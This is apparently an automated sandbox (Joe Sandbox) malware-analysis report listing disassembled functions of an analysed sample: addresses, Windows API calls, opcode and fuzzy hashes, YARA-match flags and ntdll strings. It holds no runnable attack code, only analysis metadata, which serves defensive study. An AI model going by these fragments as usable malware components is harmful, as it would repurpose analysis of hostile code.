                                                                                  Function 0042C8C3 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 140 42c8c3-42c8fc call 4046d3 call 42dad3 NtClose
                                                                                  APIs
                                                                                  • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C8F7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1566774721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Close
                                                                                  • String ID:
                                                                                  • API String ID: 3535843008-0
                                                                                  • Opcode ID: de216e622a66ebd299a07056680cbab10e1d2a0827ce620d1a7f5e78a6f7c7ce
                                                                                  • Instruction ID: 133e63d4455ab17c9b30316577fb7d960e1753245c68e5cabd7d79e4ae334b6d
                                                                                  • Opcode Fuzzy Hash: de216e622a66ebd299a07056680cbab10e1d2a0827ce620d1a7f5e78a6f7c7ce
                                                                                  • Instruction Fuzzy Hash: 46E086356042147BD120EB5AEC41F9B775CDFC5754F408419FA09A7241C6B5B91187F5
                                                                                  Function 00F82B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 154 f82b60-f82b6c LdrInitializeThunk
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 441f77228d1197e61000e0cc8c63192e2824b5d5ba03b21552eb8c4447c15d38
                                                                                  • Instruction ID: a3efc0f309478cce6d7776b941e2c2e79bb64630ca5fcc1859ab5446641a9763
                                                                                  • Opcode Fuzzy Hash: 441f77228d1197e61000e0cc8c63192e2824b5d5ba03b21552eb8c4447c15d38
                                                                                  • Instruction Fuzzy Hash: 1B90026120240013560571588414616400A87E1341B55C032E1018590EC92989927129
                                                                                  Function 00F82C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 155 f82c70-f82c7c LdrInitializeThunk
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 8f6125bbfda9ff7877326b1a5227a07460be57975506bd5448640b2ce7a592c6
                                                                                  • Instruction ID: 1b795bba94f4159031ab2cb7ac2b3153a339210e5ff17b78a2b3f16fc5a5c20e
                                                                                  • Opcode Fuzzy Hash: 8f6125bbfda9ff7877326b1a5227a07460be57975506bd5448640b2ce7a592c6
                                                                                  • Instruction Fuzzy Hash: 1C90023120148812E6107158C40474A000587D1341F59C422A4428658E8A9989927125
                                                                                  Function 00F82DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 140d1b940f640b88caab6d9876f3cca74ad7f507a8cdca40f0da607cfdf1ea36
                                                                                  • Instruction ID: 9a0c3bd3a76b6d1e499344bbe31e52bd22553f02bb51321b60ce05f6bb2f3c61
                                                                                  • Opcode Fuzzy Hash: 140d1b940f640b88caab6d9876f3cca74ad7f507a8cdca40f0da607cfdf1ea36
                                                                                  • Instruction Fuzzy Hash: 3190023120140423E61171588504707000987D1381F95C423A0428558E9A5A8A53B125
                                                                                  Function 00F835C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: 7421c0402db8c27a6277c94cc422d1c6e19e1d36f941628413aa469eddaa49b7
                                                                                  • Instruction ID: 908e2b593f21f36a93449136b2053701b584df330a8bf52d20a63e9a86b79a9c
                                                                                  • Opcode Fuzzy Hash: 7421c0402db8c27a6277c94cc422d1c6e19e1d36f941628413aa469eddaa49b7
                                                                                  • Instruction Fuzzy Hash: 9A90023160550412E60071588514706100587D1341F65C422A0428568E8B998A5275A6
                                                                                  Function 0041415A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 92threadwindowCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • PostThreadMessageW.USER32(e151968,00000111,00000000,00000000), ref: 0041423A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1566774721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: MessagePostThread
                                                                                  • String ID: e151968$e151968
                                                                                  • API String ID: 1836367815-1714165782
                                                                                  • Opcode ID: de3d6622b2c7e253488efd82844506778fe438f6aa130dcb7ce2e9c228e4284e
                                                                                  • Instruction ID: 7251796555732349115f912c6c4c209aa57bdead8f3eb1923ae9839e20d07678
                                                                                  • Opcode Fuzzy Hash: de3d6622b2c7e253488efd82844506778fe438f6aa130dcb7ce2e9c228e4284e
                                                                                  • Instruction Fuzzy Hash: A721FEB2A092587ADB015BB85C418FEBB6CCF42374B0482AFF884DB282D26D4D8343D1
                                                                                  Function 004141C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62threadwindowCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • PostThreadMessageW.USER32(e151968,00000111,00000000,00000000), ref: 0041423A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1566774721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: MessagePostThread
                                                                                  • String ID: e151968$e151968
                                                                                  • API String ID: 1836367815-1714165782
                                                                                  • Opcode ID: 9c4519be433183e511d57a0ca24e41333fd38ee9197568bd8c116b46864e7620
                                                                                  • Instruction ID: fb6054b137b1b7a90670ef45b58f19e18da369be72312329e7a814f8d004de60
                                                                                  • Opcode Fuzzy Hash: 9c4519be433183e511d57a0ca24e41333fd38ee9197568bd8c116b46864e7620
                                                                                  • Instruction Fuzzy Hash: D601DBB1D4021C7EEB11AAE59C81DEF7B7CDF41798F04806AF904B7241E67C4E4647A5
                                                                                  Function 004141C3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • PostThreadMessageW.USER32(e151968,00000111,00000000,00000000), ref: 0041423A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1566774721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: MessagePostThread
                                                                                  • String ID: e151968$e151968
                                                                                  • API String ID: 1836367815-1714165782
                                                                                  • Opcode ID: 0a07cd0e95027d051652f65d03272d9818b42054f858fe44f33b56e8d39d78d9
                                                                                  • Instruction ID: 304f4617cef094d7948f8b4e0ba8c288fe5f41b46d30d6681db389c3092ba291
                                                                                  • Opcode Fuzzy Hash: 0a07cd0e95027d051652f65d03272d9818b42054f858fe44f33b56e8d39d78d9
                                                                                  • Instruction Fuzzy Hash: 8601DBB1D0021C7ADB10AAE59C81DEF7B7CDF41798F04806AF90467241E67C4E4647A5
                                                                                  Function 00414147 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56threadwindowCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • PostThreadMessageW.USER32(e151968,00000111,00000000,00000000), ref: 0041423A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1566774721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: MessagePostThread
                                                                                  • String ID: e151968$e151968
                                                                                  • API String ID: 1836367815-1714165782
                                                                                  • Opcode ID: 9917860a06c5491fd7527a9a567e0fdb5327c2d310581294f1f00c85882a137f
                                                                                  • Instruction ID: a03890bf0caf07f143295e344698684d57de9b4f9a149aaa8d59faff12e514fd
                                                                                  • Opcode Fuzzy Hash: 9917860a06c5491fd7527a9a567e0fdb5327c2d310581294f1f00c85882a137f
                                                                                  • Instruction Fuzzy Hash: 150166B2D04218B9DB10EAA58C82CEF7B7CDF81358F0481AAF914B7240D67C4A474BA4
                                                                                  Function 0042CBC3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 130 42cbc3-42cc01 call 4046d3 call 42dad3 RtlAllocateHeap
                                                                                  APIs
                                                                                  • RtlAllocateHeap.NTDLL(?,0041E774,?,?,00000000,?,0041E774,?,?,?), ref: 0042CBFC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1566774721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AllocateHeap
                                                                                  • String ID:
                                                                                  • API String ID: 1279760036-0
                                                                                  • Opcode ID: 287ad701f9fc09d847462748f2dea7b0dd8b850354188c692eb8819c278418b1
                                                                                  • Instruction ID: d1daadd5b738771fcf8a8578342262517393979b432d42d69ec70eba3b553b61
                                                                                  • Opcode Fuzzy Hash: 287ad701f9fc09d847462748f2dea7b0dd8b850354188c692eb8819c278418b1
                                                                                  • Instruction Fuzzy Hash: 48E092716042087FC610EE59EC42E9B37ACDFC9754F008419F908A7242D670BD1087B9
                                                                                  Function 0042CC03 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 135 42cc03-42cc44 call 4046d3 call 42dad3 RtlFreeHeap
                                                                                  APIs
                                                                                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,558D0001,00000007,00000000,00000004,00000000,004171F6,000000F4), ref: 0042CC3F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1566774721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: FreeHeap
                                                                                  • String ID:
                                                                                  • API String ID: 3298025750-0
                                                                                  • Opcode ID: 7acc9a6ebdbca071d54bd213222d546e1c3df986107a84034640cb851cd2662b
                                                                                  • Instruction ID: a8743f59d5fd6b324e8fb9b63301b2ee65a769d322d9c6f3b811b81c9c5f29be
                                                                                  • Opcode Fuzzy Hash: 7acc9a6ebdbca071d54bd213222d546e1c3df986107a84034640cb851cd2662b
                                                                                  • Instruction Fuzzy Hash: D1E092716042157BC610EE49DC41F9B73ACDFC5710F004419FE08A7242D670BD2087B8
                                                                                  Function 0042CC53 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 145 42cc53-42cc8f call 4046d3 call 42dad3 ExitProcess
                                                                                  APIs
                                                                                  • ExitProcess.KERNEL32(?,00000000,00000000,?,BED2F641,?,?,BED2F641), ref: 0042CC8A
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1566774721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ExitProcess
                                                                                  • String ID:
                                                                                  • API String ID: 621844428-0
                                                                                  • Opcode ID: 6d0d9633f36f3a478799886893dbf0fc3395856193f855968f02c457220dfeca
                                                                                  • Instruction ID: f890e39a49fc289f0e184355a012a96589c9f26d3f4f8871f3224b84e537ea6d
                                                                                  • Opcode Fuzzy Hash: 6d0d9633f36f3a478799886893dbf0fc3395856193f855968f02c457220dfeca
                                                                                  • Instruction Fuzzy Hash: 74E08C326042247BD220FA5ADC02FDB77ACDFC5714F01481AFA09A7242C6B5B91287F9
                                                                                  Function 00F82C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 150 f82c0a-f82c0f 151 f82c1f-f82c26 LdrInitializeThunk 150->151 152 f82c11-f82c18 150->152
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID:
                                                                                  • API String ID: 2994545307-0
                                                                                  • Opcode ID: b61f3cf6200f1af4a33e4bbd3929615671e8d8346c8f5e0be5e10e9365f1939f
                                                                                  • Instruction ID: 9e29f36098e58cbab66a1734697e1c9bd8d2675e909f204fca5d924a9df53a8d
                                                                                  • Opcode Fuzzy Hash: b61f3cf6200f1af4a33e4bbd3929615671e8d8346c8f5e0be5e10e9365f1939f
                                                                                  • Instruction Fuzzy Hash: D2B09B71D015C5D5EF51F760460871B790067D1751F15C072D2034645F473CD5D1F275

                                                                                  Non-executed Functions

                                                                                  Function 00FC2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                  • API String ID: 0-2160512332
                                                                                  • Opcode ID: a28e66cb5d43058f4a8e003e64970352901367480a9736f3a3578d980294e140
                                                                                  • Instruction ID: 9e567d75716230914aae7c14a88539a6bf856803a1b605cab23a5a755382248a
                                                                                  • Opcode Fuzzy Hash: a28e66cb5d43058f4a8e003e64970352901367480a9736f3a3578d980294e140
                                                                                  • Instruction Fuzzy Hash: 0B92AB71A04342AFD760DF24C982F6AB7E8FB84760F04482DFA94D7291D774E944EB92
                                                                                  Function 00F78620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • Critical section address., xrefs: 00FB5502
                                                                                  • Critical section debug info address, xrefs: 00FB541F, 00FB552E
                                                                                  • corrupted critical section, xrefs: 00FB54C2
                                                                                  • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 00FB540A, 00FB5496, 00FB5519
                                                                                  • Address of the debug info found in the active list., xrefs: 00FB54AE, 00FB54FA
                                                                                  • 8, xrefs: 00FB52E3
                                                                                  • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 00FB54E2
                                                                                  • Thread is in a state in which it cannot own a critical section, xrefs: 00FB5543
                                                                                  • Thread identifier, xrefs: 00FB553A
                                                                                  • undeleted critical section in freed memory, xrefs: 00FB542B
                                                                                  • Critical section address, xrefs: 00FB5425, 00FB54BC, 00FB5534
                                                                                  • double initialized or corrupted critical section, xrefs: 00FB5508
                                                                                  • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 00FB54CE
                                                                                  • Invalid debug info address of this critical section, xrefs: 00FB54B6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                  • API String ID: 0-2368682639
                                                                                  • Opcode ID: a641835451a4fff54772882f4b2214e0fdcf1fd8efa1d3c0921405222305a275
                                                                                  • Instruction ID: 59ac8b8a45c1e3c4c831c9a8f8a75194531404127740ae20c5f2da386e520040
                                                                                  • Opcode Fuzzy Hash: a641835451a4fff54772882f4b2214e0fdcf1fd8efa1d3c0921405222305a275
                                                                                  • Instruction Fuzzy Hash: CA81ABB1E41758AFEB20CF95D845BEEBBB5AB08B24F244019F508B7280C779AD41EB51
                                                                                  Function 00F729F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 00FB2624
                                                                                  • @, xrefs: 00FB259B
                                                                                  • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 00FB2506
                                                                                  • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 00FB22E4
                                                                                  • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 00FB24C0
                                                                                  • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 00FB2602
                                                                                  • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 00FB25EB
                                                                                  • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 00FB2409
                                                                                  • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 00FB2498
                                                                                  • RtlpResolveAssemblyStorageMapEntry, xrefs: 00FB261F
                                                                                  • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 00FB2412
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                  • API String ID: 0-4009184096
                                                                                  • Opcode ID: 082e019aafc63b3303a2f187aede2eca5961cc5b792b9aa8235904ca86a8f13f
                                                                                  • Instruction ID: 20fd3bdd98dad365f58f7eb5b9cbc7da666b450ce35f9edc1e9d6968f7667fdf
                                                                                  • Opcode Fuzzy Hash: 082e019aafc63b3303a2f187aede2eca5961cc5b792b9aa8235904ca86a8f13f
                                                                                  • Instruction Fuzzy Hash: 570260B2D002289BDB71DB14CC81BDDB7B8AB54314F0441EAE64DA7241DB35AF84EF5A
                                                                                  Function 00FE8B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                  • API String ID: 0-2515994595
                                                                                  • Opcode ID: 4a8b2997a50200861f097135928ad8ab0f4fe41fe17b5d9d52fcd10fd81564f7
                                                                                  • Instruction ID: 7f7cf886162b45346146ba9f20a373ac3a609408b03743ce84df317d80f38e2a
                                                                                  • Opcode Fuzzy Hash: 4a8b2997a50200861f097135928ad8ab0f4fe41fe17b5d9d52fcd10fd81564f7
                                                                                  • Instruction Fuzzy Hash: 6151D3715083919BC335EF198C44BABBBE8BF843A0F24491EF85D83181EB70D945E7A2
                                                                                  Function 00FF0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                  • API String ID: 0-1700792311
                                                                                  • Opcode ID: 7220b3052e1991e925bd5f94dc33b092a663d4ef34c0ba1d25569cf3ef82ce53
                                                                                  • Instruction ID: b64594d385b9418dd989b77106dca68b901e607b2a8ba884e346e2e4c9fe69d0
                                                                                  • Opcode Fuzzy Hash: 7220b3052e1991e925bd5f94dc33b092a663d4ef34c0ba1d25569cf3ef82ce53
                                                                                  • Instruction Fuzzy Hash: C9D1D031900689DFCB22DF68C851ABDBBF1FF49720F088059E6459B263CB39D981EB10
                                                                                  Function 00FC89B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  • VerifierDebug, xrefs: 00FC8CA5
                                                                                  • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 00FC8A3D
                                                                                  • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 00FC8A67
                                                                                  • VerifierFlags, xrefs: 00FC8C50
                                                                                  • VerifierDlls, xrefs: 00FC8CBD
                                                                                  • AVRF: -*- final list of providers -*- , xrefs: 00FC8B8F
                                                                                  • HandleTraces, xrefs: 00FC8C8F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                  • API String ID: 0-3223716464
                                                                                  • Opcode ID: f2bf20de3203455af497e2d17e2d4ef89ccd4a9c865e12f3ee21ace71a8c2b07
                                                                                  • Instruction ID: b0819d7eb16ddcc8b186dc7825fd56457ae4d641d360b4515567760ae7b13356
                                                                                  • Opcode Fuzzy Hash: f2bf20de3203455af497e2d17e2d4ef89ccd4a9c865e12f3ee21ace71a8c2b07
                                                                                  • Instruction Fuzzy Hash: E0914872A05712AFC321DF68DE83F5A77A8BB84760F05441DF9816B291CB78EC06E791
                                                                                  Function 00F4EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                  • API String ID: 0-1109411897
                                                                                  • Opcode ID: 6b2fa83eaff73473c4cbad69f67b274537c04dbce707b999293ae98458967b60
                                                                                  • Instruction ID: 08bbd55141d56afe252836feb142cdeec6a5cf7233e2122ede9be5b3e7216a10
                                                                                  • Opcode Fuzzy Hash: 6b2fa83eaff73473c4cbad69f67b274537c04dbce707b999293ae98458967b60
                                                                                  • Instruction Fuzzy Hash: 1CA24C75E056298FDB64CF18CC887A9BBB5BF85314F2442E9D80DA7250DB74AE85EF00
                                                                                  Function 00F763FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                                  Download Yara Rule
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1567650685.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_f10000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                  • API String ID: 0-792281065
                                                                                  • Opcode ID: f71369f2b01ee1078b8071e8dcd0ffcacf042eb32aee8b9a96c627eaa95fd2e9
                                                                                  • Instruction ID: a87aa24b23a5bac97cb0f7008ea3d9d155c891565faaf7878bf1ecc214073adc
                                                                                  • Opcode Fuzzy Hash: f71369f2b01ee1078b8071e8dcd0ffcacf042eb32aee8b9a96c627eaa95fd2e9
                                                                                  • Instruction Fuzzy Hash: 7D916931E00710ABDB35EF15ED45BEA37A4BF41B24F14412AF944AB2C2D779A841FB92
                                                                                  Function 00F3645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                                  Download Yara Rule
